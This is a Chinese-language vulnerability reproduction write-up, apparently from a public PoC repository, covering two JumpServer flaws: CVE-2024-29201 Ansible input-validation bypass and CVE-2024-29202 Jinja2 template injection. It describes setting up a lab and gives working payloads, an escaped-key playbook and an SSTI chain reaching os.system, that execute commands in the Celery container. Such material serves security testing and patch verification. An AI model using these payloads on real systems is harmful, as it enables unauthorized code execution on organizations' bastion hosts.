POC/wpoc/JumpServer/JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞.md

110 lines
4.0 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
## JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞
JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。
CVE-2024-29201 远程代码执行漏洞,该漏洞可绕过 JumpServer 的 Ansible 中的输入验证机制,在 Celery 容器中执行任意代码
CVE-2024-29202 Jinin2 模板注入漏洞,该漏洞是有 JumpServer 的 Ansible 中存在 Jinja2 模板注入,在 Celery 容器中执行任意代码。
## 影响版本
```v3.0.0 <= JumpServer <= v3.10.6```
## 环境搭建
首先下载官方提供的脚本https://resource.fit2cloud.com/jumpserver/jumpserver/releases/latest/download/quick_start.sh下载后编辑 quick_start.sh将脚本中的 VERSION 修改为存在漏洞版本V3.10.6。如下图所示:
![image](https://github.com/wy876/POC/assets/139549762/8c7db9cf-a5e9-442c-9538-eae5eafd4fcd)
等待服务启动,启动完成后访问 http://ip/
![image](https://github.com/wy876/POC/assets/139549762/0e374e28-50ba-4905-a7ea-e8257e33a3ec)
JumpServer 默认账号密码为 admin/admin
接着进入后台添加资产,具体步骤如下图所示:
![image](https://github.com/wy876/POC/assets/139549762/995bf6d3-1d57-47a1-8194-ec4effdea392)
添加资产后需要测试是否添加成功,点击资产后面的 更多-测试 进行测试。
资产添加完成后添加用户,如下图所示:
![image](https://github.com/wy876/POC/assets/139549762/808c64ab-2daa-4080-b092-c83cb2426004)
最后为用户分配一个资产,如下图所示:
![image](https://github.com/wy876/POC/assets/139549762/f0ff0aad-8916-4ef1-800d-46b2f1725bb5)
至此环境搭建完成。
## CVE-2024-29201
登陆创建的普通用户账号,进入 作业中心-模板管理 添加一个 Playbook
![image](https://github.com/wy876/POC/assets/139549762/ba8cb7cd-abcd-4a76-92a9-0c5e8e064888)
点击创建的 Playbook 名称,切换到 工作空间,输入以下内容:
```
[{
"name": "RCE playbook",
"hosts": "all",
"tasks": [
{
"name": "this runs in Celery container",
"shell": "id > /tmp/pwnd",
"\u0064elegate_to": "localhost"
} ],
"vars": {
"ansible_\u0063onnection": "local"
}
}]
```
![image](https://github.com/wy876/POC/assets/139549762/b78e8eed-c3a3-46c1-a5d8-ac60d68cb2a6)
点击保存。保存完成之后切换到 作业管理 页面,创建一个新的 Playbook 作业
![image](https://github.com/wy876/POC/assets/139549762/b22c7efc-22a3-46f9-a275-eec2b3ba1257)
playbook 作业详情如下:
![image](https://github.com/wy876/POC/assets/139549762/9f727ad1-2f03-497a-8592-42b7f5229561)
点击保存并运行作业
![image](https://github.com/wy876/POC/assets/139549762/c902efd5-6646-4001-957b-16e414407f75)
结果如下
![image](https://github.com/wy876/POC/assets/139549762/9169c220-a91d-471f-8bb1-69fd8c4d3fd4)
进入 Celery 容器,查看 tmp 目录下是否存在 pwnd 文件
![image](https://github.com/wy876/POC/assets/139549762/650bf6b6-d7df-4fb8-9c00-c4d62a37d1d2)
## CVE-2024-29202
与 CVE-2024-29201类似进入 作业中心-模板管理 添加一个 Playbook在 工作空间 输入的内容为:
```
- name: |
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{
x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd2")
}}
{%endif%}
{%endfor%}
```
添加完成后,同样进入作业管理页面创建并运行 Playbook 作业。运行结果如下
![image](https://github.com/wy876/POC/assets/139549762/9b2ded4f-2db9-4910-9831-49305e8eef51)
![image](https://github.com/wy876/POC/assets/139549762/d44f6e3d-c9bb-4e5f-9fa8-f636c6210b09)
## 漏洞来源
- https://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73ch